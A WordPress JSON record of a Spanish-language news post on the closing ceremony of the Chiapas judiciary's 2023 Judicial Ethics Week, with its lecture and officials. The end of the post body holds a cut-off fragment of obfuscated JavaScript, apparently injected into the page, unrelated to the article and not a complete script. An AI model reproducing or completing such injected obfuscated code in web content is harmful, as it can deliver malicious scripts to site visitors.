{"id":11761,"date":"2023-09-11T04:45:10","date_gmt":"2023-09-11T04:45:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11761"},"modified":"2023-09-11T04:45:10","modified_gmt":"2023-09-11T04:45:10","slug":"clausura-poder-judicial-semana-de-la-etica-judicial-2023","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11761","title":{"rendered":"Clausura Poder Judicial Semana de la \u00c9tica Judicial 2023"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"591\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230910-WA0011-1024x591.jpg\" alt=\"\" class=\"wp-image-11762\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230910-WA0011-1024x591.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230910-WA0011-300x173.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230910-WA0011-768x443.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230910-WA0011.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>10 de septiembre del 2023. Como parte del programa de clausura se realiz\u00f3 la conferencia: Normas \u00c9ticas que Regulan la Impartici\u00f3n de Justicia.Tuxtla Guti\u00e9rrez, Chis. 9 de septiembre 2023.- En el marco del cierre de actividades de la Semana de la \u00c9tica Judicial y la Campa\u00f1a Justicia Con Valor, el Poder Judicial del Estado de Chiapas que encabeza el magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez, realiz\u00f3 la conferencia magistral: Normas \u00c9ticas que Regulan la Impartici\u00f3n de Justicia, desertada por el magistrado de Circuito del Tribunal Colegiado en materia del Trabajo del Vig\u00e9simo Circuito, Luis Arturo Palacio Zurita.Teniendo como sede el auditorio Don Enrique Robles Dom\u00ednguez, la consejera de la Judicatura e integrante de la Comisi\u00f3n de \u00c9tica, Zelmira Perla de Roc\u00eda Guti\u00e9rrez Beltr\u00e1n, fue la encargada de brindar el mensaje en representaci\u00f3n del magistrado presidente Ramos P\u00e9rez, en donde dio la bienvenida a las y los asistentes as\u00ed como al ponente, y destac\u00f3 que este ejercicio es de fundamental importancia para la agenda judicial, puesto que la exigencia social demanda a personas servidoras p\u00fablicas \u00edntegras, que se destinan por principios y valores en el quehacer de la administraci\u00f3n e impartici\u00f3n de justicia.A\u00f1adi\u00f3 que, debido a ello, resulta fundamental estar a la altura de la confianza de la sociedad, motivo por el cual desde la Comisi\u00f3n de \u00c9tica del Consejo de la Judicatura, se estableci\u00f3 la celebraci\u00f3n anual de esta Semana, para que junto a la campa\u00f1a Justicia con Valor, se promuevan y refuercen los valores contenidos en el C\u00f3digo de \u00c9tica, entre toda la familia judicial con su participaci\u00f3n activa, compromiso institucional y trabajo en equipo, para beneficio de las personas usuarias de la justicia.Por su parte, el magistrado y ponente, Luis Arturo Palacio Zurita, agradeci\u00f3 el espacio brindado por el magistrado presidente Ramos P\u00e9rez, y durante el desarrollo de su disertaci\u00f3n, transmitida tambi\u00e9n de manera virtual en las redes sociales del Poder Judicial, apunt\u00f3 la relevancia de ponerse la camiseta de las instituciones para proyectar con \u00e9tica el quehacer jurisdiccional, desde la experiencia personal y la legitimidad de las y los juzgadores.Al finalizar la ponencia, el magistrado presidente del Pleno de Distrito e integrante de la Comisi\u00f3n de \u00c9tica, Rigoberto Bernardino Montoya Garc\u00eda, hizo entrega de un reconocimiento y agradecimiento al ponente, adem\u00e1s de dirigir el mensaje de clausura de esta Semana de la \u00c9tica en su segunda edici\u00f3n, ante las y los servidores p\u00fablicos de esta casa de la justicia.En este evento se cont\u00f3 tambi\u00e9n con la presencia en presidium del consejero de la Judicatura, Omar Heleria Reyes y de la oficial mayor, Natividad Esperanza Gallardo Ramos.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>10 de septiembre del 2023. Como parte del programa de clausura se realiz\u00f3 la conferencia: Normas \u00c9ticas que Regulan la Impartici\u00f3n de Justicia.Tuxtla Guti\u00e9rrez, Chis. 9 de septiembre 2023.- En el marco del cierre de actividades de la Semana de la \u00c9tica Judicial y la Campa\u00f1a Justicia Con Valor, el Poder Judicial del Estado de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11762,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11761","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11761"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11761\/revisions"}],"predecessor-version":[{"id":11763,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11761\/revisions\/11763"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11762"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}